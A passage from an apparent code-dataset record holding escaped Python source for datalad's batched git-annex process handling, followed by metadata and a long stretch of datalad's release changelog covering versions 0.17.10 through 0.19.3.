(['--json', '--json-error-messages'] if json else []) + \\\n [batch_opt] + \\\n (['--debug'] if lgr.getEffectiveLevel() <= 8 else [])\n output_proc = \\\n output_proc if output_proc else readline_json if json else None\n super(BatchedAnnex, self).__init__(\n cmd,\n path=path,\n 
output_proc=output_proc)\n\n\n# TODO: Why was this commented out?\n# @auto_repr\nclass BatchedAnnexes(SafeDelCloseMixin, dict):\n \"\"\"Class to contain the registry of active batch'ed instances of annex for\n a repository\n \"\"\"\n def __init__(self, batch_size=0, git_options=None):\n self.batch_size = batch_size\n self.git_options = git_options or []\n super(BatchedAnnexes, self).__init__()\n\n def get(self, codename, annex_cmd=None, **kwargs) -> BatchedAnnex:\n if annex_cmd is None:\n annex_cmd = codename\n\n git_options = self.git_options + kwargs.pop('git_options', [])\n if self.batch_size:\n git_options += ['-c', 'annex.queuesize=%d' % self.batch_size]\n\n # START RF/BF: extend codename to respect different options the process\n # is running with\n # TODO: Eventually there should be more RF'ing, since the actually used\n # codenames are partially reflecting this already. Any options used\n # therein should go away, since they are now automatically included.\n options = kwargs.copy()\n options['git_options'] = git_options\n options['annex_cmd'] = annex_cmd\n for key in options:\n codename += ':{0}:{1}'.format(key, options[key])\n # END RF/BF\n\n if codename not in self:\n # Create a new git-annex process we will keep around\n self[codename] = BatchedAnnex(annex_cmd,\n git_options=git_options,\n **kwargs)\n return self[codename]\n\n def clear(self):\n \"\"\"Override just to make sure we don't rely on __del__ to close all\n the pipes\"\"\"\n self.close()\n super(BatchedAnnexes, self).clear()\n\n def close(self):\n \"\"\"Close communication to all the batched annexes\n\n It does not remove them from the dictionary though\n \"\"\"\n for p in self.values():\n p.close()\n\n\ndef readlines_until_ok_or_failed(stdout, maxlines=100):\n \"\"\"Read stdout until line ends with ok or failed\"\"\"\n out = ''\n i = 0\n lgr.log(3, \"Trying to receive from %s\", stdout)\n while not stdout.closed:\n i += 1\n if maxlines > 0 and i > maxlines:\n raise IOError(\"Expected no more than %d lines. So far received: %r\" % (maxlines, out))\n lgr.log(2, \"Expecting a line\")\n line = stdout.readline()\n lgr.log(2, \"Received line %r\", line)\n out += line\n if re.match(r'^.*\\b(failed|ok)$', line.rstrip()):\n break\n return out.rstrip()\n\n\ndef readline_json(stdout):\n toload = stdout.readline().strip()\n try:\n return json.loads(toload) if toload else {}\n except json.JSONDecodeError:\n lgr.error('Received undecodable JSON output: %s', toload)\n return {}\n" }, { "alpha_fraction": 0.6513754725456238, "alphanum_fraction": 0.6893076300621033, "avg_line_length": 41.83466720581055, "blob_id": "5b6587bb3420d1b61c1a8a181502ebf88b173916", "content_id": "205cead09d996906c478498c71d3b83ef918f89c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 343631, "license_type": "permissive", "max_line_length": 126, "num_lines": 7996, "path": "/docs/source/changelog.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. This file is auto-converted from CHANGELOG.md (make update-changelog) -- do not edit\n\nChange log\n**********\n0.19.3 (2023-08-10)\n===================\n\nBug Fixes\n---------\n\n- Type annotate get_status_dict and note that we can pass Exception or\n CapturedException which is not subclass. 
`PR\n #7403 <https://github.com/datalad/datalad/pull/7403>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- BF: create-sibling-gitlab used to raise a TypeError when attempting a\n recursive operation in a dataset with uninstalled subdatasets. It now\n raises an impossible result instead. `PR\n #7430 <https://github.com/datalad/datalad/pull/7430>`__ (by\n `@adswa <https://github.com/adswa>`__)\n\n- Pass branch option into recursive call within Install - for the cases\n whenever install is invoked with URL(s). Fixes\n `#7461 <https://github.com/datalad/datalad/issues/7461>`__ via `PR\n #7463 <https://github.com/datalad/datalad/pull/7463>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- Allow for reckless=ephemeral clone using relative path for the\n original location. Fixes\n `#7469 <https://github.com/datalad/datalad/issues/7469>`__ via `PR\n #7472 <https://github.com/datalad/datalad/pull/7472>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\nDocumentation\n-------------\n\n- Fix a property name and default costs described in “getting\n subdatasets” section of ``get`` documentation. Fixes\n `#7458 <https://github.com/datalad/datalad/issues/7458>`__ via `PR\n #7460 <https://github.com/datalad/datalad/pull/7460>`__ (by\n `@mslw <https://github.com/mslw>`__)\n\nInternal\n--------\n\n- Copy an adjusted environment only if requested to do so. `PR\n #7399 <https://github.com/datalad/datalad/pull/7399>`__ (by\n `@christian-monch <https://github.com/christian-monch>`__)\n\n- Eliminate uses of ``pkg_resources``. Fixes\n `#7435 <https://github.com/datalad/datalad/issues/7435>`__ via `PR\n #7439 <https://github.com/datalad/datalad/pull/7439>`__ (by\n `@jwodder <https://github.com/jwodder>`__)\n\nTests\n-----\n\n- Disable some S3 tests of their VCR taping where they fail for known\n issues. `PR #7467 <https://github.com/datalad/datalad/pull/7467>`__\n (by `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _section-1:\n\n0.19.2 (2023-07-03)\n===================\n\n.. _bug-fixes-1:\n\nBug Fixes\n---------\n\n- Remove surrounding quotes in output filenames even for newer version\n of annex. Fixes\n `#7440 <https://github.com/datalad/datalad/issues/7440>`__ via `PR\n #7443 <https://github.com/datalad/datalad/pull/7443>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _documentation-1:\n\nDocumentation\n-------------\n\n- DOC: clarify description of the “install” interface to reflect its\n convoluted behavior. `PR\n #7445 <https://github.com/datalad/datalad/pull/7445>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _section-2:\n\n0.19.1 (2023-06-26)\n===================\n\n.. _internal-1:\n\nInternal\n--------\n\n- Make compatible with upcoming release of git-annex (next after\n 10.20230407) and pass explicit core.quotepath=false to all git calls.\n Also added ``tools/find-hanged-tests`` helper. `PR\n #7372 <https://github.com/datalad/datalad/pull/7372>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _tests-1:\n\nTests\n-----\n\n- Adjust tests for upcoming release of git-annex (next after\n 10.20230407) and ignore DeprecationWarning for pkg_resources for now.\n `PR #7372 <https://github.com/datalad/datalad/pull/7372>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _section-3:\n\n0.19.0 (2023-06-14)\n===================\n\nEnhancements and New Features\n-----------------------------\n\n- Address gitlab API special character restrictions. 
`PR\n #7407 <https://github.com/datalad/datalad/pull/7407>`__ (by\n `@jsheunis <https://github.com/jsheunis>`__)\n\n- BF: The default layout of create-sibling-gitlab is now\n ``collection``. The previous default, ``hierarchy`` has been removed\n as it failed in –recursive mode in different edgecases. For\n single-level datasets, the outcome of ``collection`` and\n ``hierarchy`` is identical. `PR\n #7410 <https://github.com/datalad/datalad/pull/7410>`__ (by\n `@jsheunis <https://github.com/jsheunis>`__ and\n `@adswa <https://github.com/adswa>`__)\n\n.. _bug-fixes-2:\n\nBug Fixes\n---------\n\n- WTF - bring back and extend information on metadata extractors etc,\n and allow for sections to have subsections and be selected at both\n levels `PR #7309 <https://github.com/datalad/datalad/pull/7309>`__\n (by `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- BF: Run an actual git invocation with interactive commit config. `PR\n #7398 <https://github.com/datalad/datalad/pull/7398>`__ (by\n `@adswa <https://github.com/adswa>`__)\n\nDependencies\n------------\n\n- Raise minimal version of tqdm (progress bars) to v.4.32.0 `PR\n #7330 <https://github.com/datalad/datalad/pull/7330>`__ (by\n `@mslw <https://github.com/mslw>`__)\n\n.. _documentation-2:\n\nDocumentation\n-------------\n\n- DOC: Add a “User messaging” design doc. `PR\n #7310 <https://github.com/datalad/datalad/pull/7310>`__ (by\n `@jsheunis <https://github.com/jsheunis>`__)\n\n.. _tests-2:\n\nTests\n-----\n\n- Remove nose-based testing utils and possibility to test extensions\n using nose. `PR\n #7261 <https://github.com/datalad/datalad/pull/7261>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _section-4:\n\n0.18.5 (2023-06-13)\n===================\n\n.. _bug-fixes-3:\n\nBug Fixes\n---------\n\n- More correct summary reporting for relaxed (no size) –annex. `PR\n #7050 <https://github.com/datalad/datalad/pull/7050>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- ENH: minor tune up of addurls to be more tolerant and “informative”.\n `PR #7388 <https://github.com/datalad/datalad/pull/7388>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- Ensure that data generated by timeout handlers in the asynchronous\n runner are accessible via the result generator, even if no other\n other events occur. `PR\n #7390 <https://github.com/datalad/datalad/pull/7390>`__ (by\n `@christian-monch <https://github.com/christian-monch>`__)\n\n- Do not map (leave as is) trailing / or  in github URLs. `PR\n #7418 <https://github.com/datalad/datalad/pull/7418>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _documentation-3:\n\nDocumentation\n-------------\n\n- Use ``sphinx_autodoc_typehints``. Fixes\n `#7404 <https://github.com/datalad/datalad/issues/7404>`__ via `PR\n #7412 <https://github.com/datalad/datalad/pull/7412>`__ (by\n `@jwodder <https://github.com/jwodder>`__)\n\n.. _internal-2:\n\nInternal\n--------\n\n- Discontinue ConfigManager abuse for Git identity warning. `PR\n #7378 <https://github.com/datalad/datalad/pull/7378>`__ (by\n `@mih <https://github.com/mih>`__) and `PR\n #7392 <https://github.com/datalad/datalad/pull/7392>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _tests-3:\n\nTests\n-----\n\n- Boost python to 3.8 during extensions testing. `PR\n #7413 <https://github.com/datalad/datalad/pull/7413>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- Skip test_system_ssh_version if no ssh found + split parsing into\n separate test. 
`PR\n #7422 <https://github.com/datalad/datalad/pull/7422>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _section-5:\n\n0.18.4 (2023-05-16)\n===================\n\n.. _bug-fixes-4:\n\nBug Fixes\n---------\n\n- Provider config files were ignored, when CWD changed between\n different datasets during runtime. Fixes\n `#7347 <https://github.com/datalad/datalad/issues/7347>`__ via `PR\n #7357 <https://github.com/datalad/datalad/pull/7357>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n.. _documentation-4:\n\nDocumentation\n-------------\n\n- Added a workaround for an issue with documentation theme (search\n function not working on Read the Docs). Fixes\n `#7374 <https://github.com/datalad/datalad/issues/7374>`__ via `PR\n #7385 <https://github.com/datalad/datalad/pull/7385>`__ (by\n `@mslw <https://github.com/mslw>`__)\n\n.. _internal-3:\n\nInternal\n--------\n\n- Type-annotate ``datalad/support/gitrepo.py``. `PR\n #7341 <https://github.com/datalad/datalad/pull/7341>`__ (by\n `@jwodder <https://github.com/jwodder>`__)\n\n.. _tests-4:\n\nTests\n-----\n\n- Fix failing testing on CI `PR\n #7379 <https://github.com/datalad/datalad/pull/7379>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n - use sample S3 url DANDI archive,\n - use our copy of old .deb from datasets.datalad.org instead of\n snapshots.d.o\n - use specific miniconda installer for py 3.7.\n\n.. _section-6:\n\n0.18.3 (2023-03-25)\n===================\n\n.. _bug-fixes-5:\n\nBug Fixes\n---------\n\n- Fixed that the ``get`` command would fail, when subdataset\n source-candidate-templates where using the ``path`` property from\n ``.gitmodules``. Also enhance the respective documentation for the\n ``get`` command. Fixes\n `#7274 <https://github.com/datalad/datalad/issues/7274>`__ via `PR\n #7280 <https://github.com/datalad/datalad/pull/7280>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n- Improve up-to-dateness of config reports across manager instances.\n Fixes `#7299 <https://github.com/datalad/datalad/issues/7299>`__ via\n `PR #7301 <https://github.com/datalad/datalad/pull/7301>`__ (by\n `@mih <https://github.com/mih>`__)\n\n- BF: GitRepo.merge do not allow merging unrelated unconditionally. `PR\n #7312 <https://github.com/datalad/datalad/pull/7312>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- Do not render (empty) WTF report on other records. `PR\n #7322 <https://github.com/datalad/datalad/pull/7322>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- Fixed a bug where changing DataLad’s log level could lead to failing\n git-annex calls. Fixes\n `#7328 <https://github.com/datalad/datalad/issues/7328>`__ via `PR\n #7329 <https://github.com/datalad/datalad/pull/7329>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n- Fix an issue with uninformative error reporting by the datalad\n special remote. Fixes\n `#7332 <https://github.com/datalad/datalad/issues/7332>`__ via `PR\n #7333 <https://github.com/datalad/datalad/pull/7333>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n- Fix save to not force committing into git if reference dataset is\n pure git (not git-annex). Fixes\n `#7351 <https://github.com/datalad/datalad/issues/7351>`__ via `PR\n #7355 <https://github.com/datalad/datalad/pull/7355>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _documentation-5:\n\nDocumentation\n-------------\n\n- Include a few previously missing commands in html API docs. 
Fixes\n `#7288 <https://github.com/datalad/datalad/issues/7288>`__ via `PR\n #7289 <https://github.com/datalad/datalad/pull/7289>`__ (by\n `@mslw <https://github.com/mslw>`__)\n\n.. _internal-4:\n\nInternal\n--------\n\n- Type-annotate almost all of ``datalad/utils.py``; add\n ``datalad/typing.py``. `PR\n #7317 <https://github.com/datalad/datalad/pull/7317>`__ (by\n `@jwodder <https://github.com/jwodder>`__)\n\n- Type-annotate and fix ``datalad/support/strings.py``. `PR\n #7318 <https://github.com/datalad/datalad/pull/7318>`__ (by\n `@jwodder <https://github.com/jwodder>`__)\n\n- Type-annotate ``datalad/support/globbedpaths.py``. `PR\n #7327 <https://github.com/datalad/datalad/pull/7327>`__ (by\n `@jwodder <https://github.com/jwodder>`__)\n\n- Extend type-annotations for ``datalad/support/path.py``. `PR\n #7336 <https://github.com/datalad/datalad/pull/7336>`__ (by\n `@jwodder <https://github.com/jwodder>`__)\n\n- Type-annotate various things in ``datalad/runner/``. `PR\n #7337 <https://github.com/datalad/datalad/pull/7337>`__ (by\n `@jwodder <https://github.com/jwodder>`__)\n\n- Type-annotate some more files in ``datalad/support/``. `PR\n #7339 <https://github.com/datalad/datalad/pull/7339>`__ (by\n `@jwodder <https://github.com/jwodder>`__)\n\n.. _tests-5:\n\nTests\n-----\n\n- Skip or xfail some currently failing or stalling tests. `PR\n #7331 <https://github.com/datalad/datalad/pull/7331>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- Skip with_sameas_remote when rsync and annex are incompatible. Fixes\n `#7320 <https://github.com/datalad/datalad/issues/7320>`__ via `PR\n #7342 <https://github.com/datalad/datalad/pull/7342>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n- Fix testing assumption - do create pure GitRepo superdataset and test\n against it. `PR\n #7353 <https://github.com/datalad/datalad/pull/7353>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _section-7:\n\n0.18.2 (2023-02-27)\n===================\n\n.. _bug-fixes-6:\n\nBug Fixes\n---------\n\n- Fix ``create-sibling`` for non-English SSH remotes by providing\n ``LC_ALL=C`` for the ``ls`` call. `PR\n #7265 <https://github.com/datalad/datalad/pull/7265>`__ (by\n `@nobodyinperson <https://github.com/nobodyinperson>`__)\n\n- Fix EnsureListOf() and EnsureTupleOf() for string inputs. `PR\n #7267 <https://github.com/datalad/datalad/pull/7267>`__ (by\n `@nobodyinperson <https://github.com/nobodyinperson>`__)\n\n- create-sibling: Use C.UTF-8 locale instead of C on the remote end.\n `PR #7273 <https://github.com/datalad/datalad/pull/7273>`__ (by\n `@nobodyinperson <https://github.com/nobodyinperson>`__)\n\n- Address compatibility with most recent git-annex where info would\n exit with non-0. `PR\n #7292 <https://github.com/datalad/datalad/pull/7292>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _dependencies-1:\n\nDependencies\n------------\n\n- Revert “Revert”Remove chardet version upper limit\"\". `PR\n #7263 <https://github.com/datalad/datalad/pull/7263>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _internal-5:\n\nInternal\n--------\n\n- Codespell more (CHANGELOGs etc) and remove custom CLI options from\n tox.ini. `PR #7271 <https://github.com/datalad/datalad/pull/7271>`__\n (by `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _tests-6:\n\nTests\n-----\n\n- Use older python 3.8 in testing nose utils in github-action\n test-nose. 
Fixes\n `#7259 <https://github.com/datalad/datalad/issues/7259>`__ via `PR\n #7260 <https://github.com/datalad/datalad/pull/7260>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _section-8:\n\n0.18.1 (2023-01-16)\n===================\n\n.. _bug-fixes-7:\n\nBug Fixes\n---------\n\n- Fixes crashes on windows where DataLad was mistaking git-annex\n 10.20221212 for a not yet released git-annex version and trying to\n use a new feature. Fixes\n `#7248 <https://github.com/datalad/datalad/issues/7248>`__ via `PR\n #7249 <https://github.com/datalad/datalad/pull/7249>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n.. _documentation-6:\n\nDocumentation\n-------------\n\n- DOC: fix EnsureCallable docstring. `PR\n #7245 <https://github.com/datalad/datalad/pull/7245>`__ (by\n `@matrss <https://github.com/matrss>`__)\n\nPerformance\n-----------\n\n- Integrate buffer size optimization from datalad-next, leading to\n significant performance improvement for status and diff. Fixes\n `#7190 <https://github.com/datalad/datalad/issues/7190>`__ via `PR\n #7250 <https://github.com/datalad/datalad/pull/7250>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n.. _section-9:\n\n0.18.0 (2022-12-31)\n===================\n\nBreaking Changes\n----------------\n\n- Move all old-style metadata commands ``aggregate_metadata``,\n ``search``, ``metadata`` and ``extract-metadata``, as well as the\n ``cfg_metadatatypes`` procedure and the old metadata extractors into\n the datalad-deprecated extension. Now recommended way of handling\n metadata is to install the datalad-metalad extension instead. Fixes\n `#7012 <https://github.com/datalad/datalad/issues/7012>`__ via `PR\n #7014 <https://github.com/datalad/datalad/pull/7014>`__\n\n- Automatic reconfiguration of the ORA special remote when cloning from\n RIA stores now only applies locally rather than being committed. `PR\n #7235 <https://github.com/datalad/datalad/pull/7235>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n.. _enhancements-and-new-features-1:\n\nEnhancements and New Features\n-----------------------------\n\n- A repository description can be specified with a new\n ``--description`` option when creating siblings using\n ``create-sibling-[gin|gitea|github|gogs]``. Fixes\n `#6816 <https://github.com/datalad/datalad/issues/6816>`__ via `PR\n #7109 <https://github.com/datalad/datalad/pull/7109>`__ (by\n `@mslw <https://github.com/mslw>`__)\n\n- Make validation failure of alternative constraints more informative.\n Fixes `#7092 <https://github.com/datalad/datalad/issues/7092>`__ via\n `PR #7132 <https://github.com/datalad/datalad/pull/7132>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n- Saving removed dataset content was sped-up, and reporting of types of\n removed content now accurately states ``dataset`` for added and\n removed subdatasets, instead of ``file``. Moreover, saving previously\n staged deletions is now also reported. `PR\n #6784 <https://github.com/datalad/datalad/pull/6784>`__ (by\n `@mih <https://github.com/mih>`__)\n\n- ``foreach-dataset`` command got a new possible value for the\n –output-streamns|–o-s option ‘relpath’ to capture and pass-through\n prefixing with path to subds. Very handy for e.g. running\n ``git grep`` command across subdatasets. 
`PR\n #7071 <https://github.com/datalad/datalad/pull/7071>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- New config\n ``datalad.create-sibling-ghlike.extra-remote-settings.NETLOC.KEY=VALUE``\n allows to add and/or overwrite local configuration for the created\n sibling by the commands\n ``create-sibling-<gin|gitea|github|gitlab|gogs>``. `PR\n #7213 <https://github.com/datalad/datalad/pull/7213>`__ (by\n `@matrss <https://github.com/matrss>`__)\n\n- The ``siblings`` command does not concern the user with messages\n about inconsequential failure to annex-enable a remote anymore. `PR\n #7217 <https://github.com/datalad/datalad/pull/7217>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n- ORA special remote now allows to override its configuration locally.\n `PR #7235 <https://github.com/datalad/datalad/pull/7235>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n- Added a ‘ria’ special remote to provide backwards compatibility with\n datasets that were set up with the deprecated\n `ria-remote <https://github.com/datalad/git-annex-ria-remote>`__. `PR\n #7235 <https://github.com/datalad/datalad/pull/7235>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n.. _bug-fixes-8:\n\nBug Fixes\n---------\n\n- When ``create-sibling-ria`` was invoked with a sibling name of a\n pre-existing sibling, a duplicate key in the result record caused a\n crashed. Fixes\n `#6950 <https://github.com/datalad/datalad/issues/6950>`__ via `PR\n #6952 <https://github.com/datalad/datalad/pull/6952>`__ (by\n `@adswa <https://api.github.com/users/adswa>`__)\n\n.. _documentation-7:\n\nDocumentation\n-------------\n\n- create-sibling-ria’s docstring now defines the schema of RIA URLs and\n clarifies internal layout of a RIA store. `PR\n #6861 <https://github.com/datalad/datalad/pull/6861>`__ (by\n `@adswa <https://api.github.com/users/adswa>`__)\n\n- Move maintenance team info from issue to CONTRIBUTING. `PR\n #6904 <https://github.com/datalad/datalad/pull/6904>`__ (by\n `@adswa <https://api.github.com/users/adswa>`__)\n\n- Describe specifications for a DataLad GitHub Action. `PR\n #6931 <https://github.com/datalad/datalad/pull/6931>`__ (by\n `@thewtex <https://api.github.com/users/thewtex>`__)\n\n- Fix capitalization of some service names. `PR\n #6936 <https://github.com/datalad/datalad/pull/6936>`__ (by\n `@aqw <https://api.github.com/users/aqw>`__)\n\n- Command categories in help text are more consistently named. `PR\n #7027 <https://github.com/datalad/datalad/pull/7027>`__ (by\n `@aqw <https://api.github.com/users/aqw>`__)\n\n- DOC: Add design document on Tests and CI. `PR\n #7195 <https://github.com/datalad/datalad/pull/7195>`__ (by\n `@adswa <https://github.com/adswa>`__)\n\n- CONTRIBUTING.md was extended with up-to-date information on CI\n logging, changelog and release procedures. `PR\n #7204 <https://github.com/datalad/datalad/pull/7204>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _internal-6:\n\nInternal\n--------\n\n- Allow EnsureDataset constraint to handle Path instances. 
Fixes\n `#7069 <https://github.com/datalad/datalad/issues/7069>`__ via `PR\n #7133 <https://github.com/datalad/datalad/pull/7133>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n- Use ``looseversion.LooseVersion`` as drop-in replacement for\n ``distutils.version.LooseVersion`` Fixes\n `#6307 <https://github.com/datalad/datalad/issues/6307>`__ via `PR\n #6839 <https://github.com/datalad/datalad/pull/6839>`__ (by\n `@effigies <https://api.github.com/users/effigies>`__)\n\n- Use –pathspec-from-file where possible instead of passing long lists\n of paths to git/git-annex calls. Fixes\n `#6922 <https://github.com/datalad/datalad/issues/6922>`__ via `PR\n #6932 <https://github.com/datalad/datalad/pull/6932>`__ (by\n `@yarikoptic <https://api.github.com/users/yarikoptic>`__)\n\n- Make clone_dataset() better patchable ny extensions and less\n monolithic. `PR\n #7017 <https://github.com/datalad/datalad/pull/7017>`__ (by\n `@mih <https://api.github.com/users/mih>`__)\n\n- Remove ``simplejson`` in favor of using ``json``. Fixes\n `#7034 <https://github.com/datalad/datalad/issues/7034>`__ via `PR\n #7035 <https://github.com/datalad/datalad/pull/7035>`__ (by\n `@christian-monch <https://api.github.com/users/christian-monch>`__)\n\n- Fix an error in the command group names-test. `PR\n #7044 <https://github.com/datalad/datalad/pull/7044>`__ (by\n `@christian-monch <https://api.github.com/users/christian-monch>`__)\n\n- Move eval_results() into interface.base to simplify imports for\n command implementations. Deprecate use from interface.utils\n accordingly. Fixes\n `#6694 <https://github.com/datalad/datalad/issues/6694>`__ via `PR\n #7170 <https://github.com/datalad/datalad/pull/7170>`__ (by\n `@adswa <https://github.com/adswa>`__)\n\n.. _performance-1:\n\nPerformance\n-----------\n\n- Use regular dicts instead of OrderedDicts for speedier operations.\n Fixes `#6566 <https://github.com/datalad/datalad/issues/6566>`__ via\n `PR #7174 <https://github.com/datalad/datalad/pull/7174>`__ (by\n `@adswa <https://github.com/adswa>`__)\n\n- Reimplement ``get_submodules_()`` without ``get_content_info()`` for\n substantial performance boosts especially for large datasets with few\n subdatasets. Originally proposed in `PR\n #6942 <https://github.com/datalad/datalad/pull/6942>`__ by\n `@mih <https://github.com/mih>`__, fixing\n `#6940 <https://github.com/datalad/datalad/issues/6940>`__. `PR\n #7189 <https://github.com/datalad/datalad/pull/7189>`__ (by\n `@adswa <https://github.com/adswa>`__). Complemented with `PR\n #7220 <https://github.com/datalad/datalad/pull/7220>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__) to avoid ``O(N^2)``\n (instead of ``O(N*log(N))`` performance in some cases.\n\n- Use –include=\\* or –anything instead of –copies 0 to speed up\n get_content_annexinfo. `PR\n #7230 <https://github.com/datalad/datalad/pull/7230>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _tests-7:\n\nTests\n-----\n\n- Re-enable two now-passing core test on Windows CI. `PR\n #7152 <https://github.com/datalad/datalad/pull/7152>`__ (by\n `@adswa <https://api.github.com/users/adswa>`__)\n\n- Remove the ``with_testrepos`` decorator and associated tests for it\n Fixes `#6752 <https://github.com/datalad/datalad/issues/6752>`__ via\n `PR #7176 <https://github.com/datalad/datalad/pull/7176>`__ (by\n `@adswa <https://api.github.com/users/adswa>`__)\n\n.. _section-10:\n\n0.17.10 (2022-12-14)\n====================\n\n.. 
_enhancements-and-new-features-2:\n\nEnhancements and New Features\n-----------------------------\n\n- Enhance concurrent invocation behavior of ``ThreadedRunner.run()``.\n If possible invocations are serialized instead of raising *re-enter*\n runtime errors. Deadlock situations are detected and runtime errors\n are raised instead of deadlocking. Fixes\n `#7138 <https://github.com/datalad/datalad/issues/7138>`__ via `PR\n #7201 <https://github.com/datalad/datalad/pull/7201>`__ (by\n `@christian-monch <https://github.com/christian-monch>`__)\n\n- Exceptions bubbling up through CLI are now reported on including\n their chain of **cause**. Fixes\n `#7163 <https://github.com/datalad/datalad/issues/7163>`__ via `PR\n #7210 <https://github.com/datalad/datalad/pull/7210>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n.. _bug-fixes-9:\n\nBug Fixes\n---------\n\n- BF: read RIA config from stdin instead of temporary file. Fixes\n `#6514 <https://github.com/datalad/datalad/issues/6514>`__ via `PR\n #7147 <https://github.com/datalad/datalad/pull/7147>`__ (by\n `@adswa <https://github.com/adswa>`__)\n\n- Prevent doomed annex calls on files we already know are untracked.\n Fixes `#7032 <https://github.com/datalad/datalad/issues/7032>`__ via\n `PR #7166 <https://github.com/datalad/datalad/pull/7166>`__ (by\n `@adswa <https://github.com/adswa>`__)\n\n- Comply to Posix-like clone URL formats on Windows. Fixes\n `#7180 <https://github.com/datalad/datalad/issues/7180>`__ via `PR\n #7181 <https://github.com/datalad/datalad/pull/7181>`__ (by\n `@adswa <https://github.com/adswa>`__)\n\n- Ensure that paths used in the datalad-url field of .gitmodules are\n posix. Fixes\n `#7182 <https://github.com/datalad/datalad/issues/7182>`__ via `PR\n #7183 <https://github.com/datalad/datalad/pull/7183>`__ (by\n `@adswa <https://github.com/adswa>`__)\n\n- Bandaids for export-to-figshare to restore functionality. `PR\n #7188 <https://github.com/datalad/datalad/pull/7188>`__ (by\n `@adswa <https://github.com/adswa>`__)\n\n- Fixes hanging threads when ``close()`` or ``del`` where called in\n ``BatchedCommand`` instances. That could lead to hanging tests if the\n tests used the ``@serve_path_via_http()``-decorator Fixes\n `#6804 <https://github.com/datalad/datalad/issues/6804>`__ via `PR\n #7201 <https://github.com/datalad/datalad/pull/7201>`__ (by\n `@christian-monch <https://github.com/christian-monch>`__)\n\n- Interpret file-URL path components according to the local operating\n system as described in RFC 8089. With this fix,\n ``datalad.network.RI('file:...').localpath`` returns a correct local\n path on Windows if the RI is constructed with a file-URL. Fixes\n `#7186 <https://github.com/datalad/datalad/issues/7186>`__ via `PR\n #7206 <https://github.com/datalad/datalad/pull/7206>`__ (by\n `@christian-monch <https://github.com/christian-monch>`__)\n\n- Fix a bug when retrieving several files from a RIA store via SSH,\n when the annex key does not contain size information. Fixes\n `#7214 <https://github.com/datalad/datalad/issues/7214>`__ via `PR\n #7215 <https://github.com/datalad/datalad/pull/7215>`__ (by\n `@mslw <https://github.com/mslw>`__)\n\n- Interface-specific (python vs CLI) doc generation for commands and\n their parameters was broken when brackets were used within the\n interface markups. Fixes\n `#7225 <https://github.com/datalad/datalad/issues/7225>`__ via `PR\n #7226 <https://github.com/datalad/datalad/pull/7226>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n.. 
